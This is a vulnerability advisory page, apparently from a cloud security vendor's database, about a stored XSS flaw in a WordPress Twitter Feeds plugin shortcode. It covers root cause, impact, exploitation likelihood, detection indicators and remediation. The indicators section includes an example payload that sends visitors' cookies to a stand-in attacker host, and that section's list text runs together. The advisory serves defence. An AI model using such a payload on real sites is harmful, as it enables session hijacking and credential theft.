
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1911 is a Stored Cross-Site Scripting (XSS) vulnerability in the Twitter Feeds plugin for WordPress, affecting all versions up to and including 1.0.0. The flaw exists in the tweet_title parameter of the TwitterFeeds shortcode due to insufficient input sanitization and output escaping. It was published on March 21, 2026, with Wordfence credited as the assigner. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. The vulnerable code is located in twitter-feeds.php at line 490, where the tweet_title parameter passed to the TwitterFeeds shortcode is rendered without proper sanitization or escaping. An authenticated attacker with at least Contributor-level access can embed malicious JavaScript in a post or page using the shortcode; the script executes in the browser of any user who subsequently visits the affected page. No special configuration is required beyond having the plugin active and Contributor-level credentials (Wordfence, WordPress Trac).
Successful exploitation allows an attacker to inject and persistently store arbitrary JavaScript that executes in the context of any visitor's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, defacement, redirection to malicious sites, or further attacks against site administrators — potentially escalating to full site compromise if an admin account is hijacked. Confidentiality and integrity are both impacted (low severity each per CVSS), while availability is unaffected (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1911 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Red Hat CVE).
TwitterFeeds shortcode with a malicious payload in the tweet_title parameter, e.g., [TwitterFeeds tweet_title="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].tweet_title value is rendered in the HTML response, causing the browser to execute the injected script.wp-admin/post.php or the REST API containing tweet_title parameters with HTML tags, <script>, or encoded JavaScript (e.g., %3Cscript%3E).wp_posts table within shortcode content referencing TwitterFeeds.TwitterFeeds shortcode, potentially carrying cookie or session data in query parameters.twitter-feeds.php or related plugin files if an attacker escalates to file write access after session hijacking.The primary remediation is to update the Twitter Feeds plugin beyond version 1.0.0 once a patched release is made available by the vendor (viaviwebtech). If no patch is available, site administrators should deactivate and remove the plugin immediately. As an interim measure, restrict Contributor-level user registration and audit existing Contributor accounts for unauthorized activity. Web application firewalls (WAFs) with XSS filtering rules can provide additional defense-in-depth (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."